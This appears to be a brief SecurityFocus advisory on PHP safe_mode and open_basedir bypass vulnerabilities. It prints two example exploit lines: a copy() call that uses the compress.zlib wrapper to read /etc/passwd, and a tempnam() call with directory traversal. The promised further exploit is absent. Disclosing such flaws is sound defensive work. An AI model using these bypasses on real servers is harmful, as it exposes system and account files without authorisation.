PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass Vulnerabilities

Attackers may exploit these issues with standard PHP code.

An example statement exploiting the 'copy()' issue is available:

copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");



An example statement exploiting the 'tempnam()' issue is available:

tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");


The following exploit is available:


 

Privacy Statement
Copyright 2010, SecurityFocus